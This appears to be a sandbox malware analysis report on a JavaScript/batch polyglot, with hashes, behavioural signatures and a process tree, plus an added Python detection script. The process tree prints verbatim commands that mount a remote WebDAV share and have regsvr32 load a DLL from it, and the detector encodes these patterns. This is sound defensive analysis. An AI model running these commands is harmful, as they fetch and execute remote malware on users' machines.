Analysis

max time kernel: 149s
max time network: 152s
platform: windows10-2004_x64
resource: win10v2004-20240709-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240709-en, locale:en-us, os:windows10-2004-x64, system
submitted: 10/07/2024, 01:02

Static task: static1

Behavioral task: behavioral1
Sample: 04c2348f657a19c89f4e6e13dd0bb86b72908ca0a3390b87b0d7ea79d91d0e7d.js
Resource: win7-20240704-en

Behavioral task: behavioral2
Sample: 04c2348f657a19c89f4e6e13dd0bb86b72908ca0a3390b87b0d7ea79d91d0e7d.js
Resource: win10v2004-20240709-en
General

Target: 04c2348f657a19c89f4e6e13dd0bb86b72908ca0a3390b87b0d7ea79d91d0e7d.js
Size: 5KB
MD5: 81ff023b48275d5a6b535a2370fce4a3
SHA1: 9de4cdf4c8e6598f2aeb2529b2e2036ed5eedd7f
SHA256: 04c2348f657a19c89f4e6e13dd0bb86b72908ca0a3390b87b0d7ea79d91d0e7d
SHA512: 47f381a7ba1c3952320761dcc01b87094e576ecb7cefb306d6aaddf925a7e1174a0824766e81a166641cbb2e2723506c451c3d4d05f8d8e26c2be93d33f73849
SSDEEP: 96:1cmrqBIO0hGCoFWU6660aBFWU6660WowHZJAcn2PqjVRQ6iVpPkY:1vqaUCoFWU6665BFWU666PMS2PqjVRgF
Malware Config

Signatures

Checks computer location settings (2 TTPs, 1 IoC)
Looks up the country code configured in the registry, likely a geofence check.
ioc: Key value queried \REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\Control Panel\International\Geo\Nation
Process: wscript.exe

Command and Scripting Interpreter: JavaScript (1 TTP)

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Runs net.exe

Suspicious use of WriteProcessMemory (6 IoCs)
description                        pid   Process      procid_target
PID 1396 wrote to memory of 3864   1396  wscript.exe  80
PID 1396 wrote to memory of 3864   1396  wscript.exe  80
PID 3864 wrote to memory of 4344   3864  cmd.exe      82
PID 3864 wrote to memory of 4344   3864  cmd.exe      82
PID 3864 wrote to memory of 4192   3864  cmd.exe      83
PID 3864 wrote to memory of 4192   3864  cmd.exe      83
Processes

1. C:\Windows\system32\wscript.exe
   wscript.exe C:\Users\Admin\AppData\Local\Temp\04c2348f657a19c89f4e6e13dd0bb86b72908ca0a3390b87b0d7ea79d91d0e7d.js
   PID: 1396
   - Checks computer location settings
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\04c2348f657a19c89f4e6e13dd0bb86b72908ca0a3390b87b0d7ea79d91d0e7d.js" "C:\Users\Admin\\afzwlo.bat" && "C:\Users\Admin\\afzwlo.bat"
      PID: 3864
      - Suspicious use of WriteProcessMemory

      3. C:\Windows\system32\net.exe
         net use \\45.9.74.13@8888\DavWWWRoot\
         PID: 4344

      3. C:\Windows\system32\regsvr32.exe
         regsvr32 /s \\45.9.74.13@8888\DavWWWRoot\220.dll
         PID: 4192
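The process tree is the detectable part of this sample: wscript.exe starts cmd.exe, which copies the .js file to a .bat and runs that copy (the same file executes a second time as a batch script, a JS/BAT polyglot); the batch then mounts \\45.9.74.13@8888\DavWWWRoot\ with net use (the @8888 suffix makes the WebDAV redirector fetch the share over HTTP on port 8888) and has regsvr32 /s load 220.dll straight from that share. The following is an added example, not part of the tria.ge report or of the sample: a small Python detector run over constructed process-creation events (Sysmon Event ID 1 style, reduced to pid/ppid/image/command line) that reproduce the report's tree plus a benign control chain. The rule names, the event shape and the parent PID 0 for the root processes are assumptions.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
REMOTE_DLL_LOADERS = {"regsvr32.exe", "rundll32.exe"}

# \\host@port\DavWWWRoot\ or \\host@SSL@443\DavWWWRoot\: the WebDAV Mini-Redirector
# turns this UNC into HTTP(S) requests, so a "net use" against it is really a web download.
WEBDAV_UNC = re.compile(
    r"\\\\[\w.\-]+(?:@ssl)?(?:@\d{1,5})?\\davwwwroot(?:\\|$|\s)", re.IGNORECASE)
# cmd.exe copying a script file to a .bat/.cmd (JS/BAT polyglot); group(1) is the copy
POLYGLOT_COPY = re.compile(
    r'copy\s+"?[^"\s]+\.(?:js|jse|vbs|wsf)"?\s+"?([^"\s]+\.(?:bat|cmd))"?', re.IGNORECASE)
# a DLL argument given as a UNC path (\\server\share\x.dll)
UNC_DLL_ARG = re.compile(r"(?:^|\s)\\\\[^\s]+\.dll\b", re.IGNORECASE)


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the created process
    cmdline: str


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(pid: int, by_pid: Dict[int, ProcEvent]) -> List[str]:
    """Image basenames of all known ancestors, nearest parent first."""
    chain, seen = [], set()
    cur = by_pid.get(pid)
    while cur and cur.ppid in by_pid and cur.ppid not in seen:
        seen.add(cur.ppid)
        cur = by_pid[cur.ppid]
        chain.append(basename(cur.image))
    return chain


def detect(events: List[ProcEvent]) -> List[Tuple[str, int, str]]:
    """Return (rule, pid, detail) for every event that matches one of the three rules."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        name = basename(e.image)
        parents = ancestry(e.pid, by_pid)
        from_script_host = any(p in SCRIPT_HOSTS for p in parents)
        # Rule 1: a script host's cmd.exe child copies the script to .bat and then runs the copy
        if name == "cmd.exe" and parents[:1] and parents[0] in SCRIPT_HOSTS:
            m = POLYGLOT_COPY.search(e.cmdline)
            if m and m.group(1).lower() in e.cmdline[m.end():].lower():
                findings.append(("script_host_polyglot_bat", e.pid, m.group(1)))
        # Rule 2: net use against a WebDAV UNC path
        if name in {"net.exe", "net1.exe"} and re.match(r"net1?(?:\.exe)?\s+use\b", e.cmdline, re.I):
            u = WEBDAV_UNC.search(e.cmdline)
            if u:
                findings.append(("net_use_webdav", e.pid, u.group(0).strip()))
        # Rule 3: regsvr32/rundll32 loading a DLL from a UNC path; escalate if a script host is upstream
        if name in REMOTE_DLL_LOADERS:
            u = UNC_DLL_ARG.search(e.cmdline)
            if u:
                rule = "lolbin_remote_dll_from_script" if from_script_host else "lolbin_remote_dll"
                findings.append((rule, e.pid, u.group(0).strip()))
    return findings


# Constructed events: the report's tree (PIDs and command lines as shown above) plus a
# benign control chain that also goes script host -> cmd.exe -> net use, but to an SMB share.
SAMPLE_EVENTS = [
    ProcEvent(1396, 0, r"C:\Windows\system32\wscript.exe",
              r"wscript.exe C:\Users\Admin\AppData\Local\Temp\04c2348f657a19c89f4e6e13dd0bb86b72908ca0a3390b87b0d7ea79d91d0e7d.js"),
    ProcEvent(3864, 1396, r"C:\Windows\System32\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\04c2348f657a19c89f4e6e13dd0bb86b72908ca0a3390b87b0d7ea79d91d0e7d.js" "C:\Users\Admin\\afzwlo.bat" && "C:\Users\Admin\\afzwlo.bat"'),
    ProcEvent(4344, 3864, r"C:\Windows\system32\net.exe", "net use \\\\45.9.74.13@8888\\DavWWWRoot\\"),
    ProcEvent(4192, 3864, r"C:\Windows\system32\regsvr32.exe", r"regsvr32 /s \\45.9.74.13@8888\DavWWWRoot\220.dll"),
    ProcEvent(5000, 0, r"C:\Windows\system32\cscript.exe", r"cscript.exe logon.vbs"),
    ProcEvent(5001, 5000, r"C:\Windows\System32\cmd.exe", r'cmd.exe /c "C:\Scripts\map_drives.bat"'),
    ProcEvent(5002, 5001, r"C:\Windows\system32\net.exe", r"net use H: \\fileserver\home"),
]

if __name__ == "__main__":
    for rule, pid, detail in detect(SAMPLE_EVENTS):
        print(f"{rule:32} pid={pid} {detail}")
```

Run against the constructed events it reports the three malicious steps (polyglot copy in PID 3864, WebDAV mount in PID 4344, remote DLL load in PID 4192, the last one escalated because wscript.exe is an ancestor) and nothing for the control chain. The rules key on what the sample cannot easily change (a script host copying itself to .bat, DavWWWRoot in a net use target, a UNC DLL argument to a registration LOLBin) rather than on the IP, port or file name.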
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 5KB
MD5: 81ff023b48275d5a6b535a2370fce4a3
SHA1: 9de4cdf4c8e6598f2aeb2529b2e2036ed5eedd7f
SHA256: 04c2348f657a19c89f4e6e13dd0bb86b72908ca0a3390b87b0d7ea79d91d0e7d
SHA512: 47f381a7ba1c3952320761dcc01b87094e576ecb7cefb306d6aaddf925a7e1174a0824766e81a166641cbb2e2723506c451c3d4d05f8d8e26c2be93d33f73849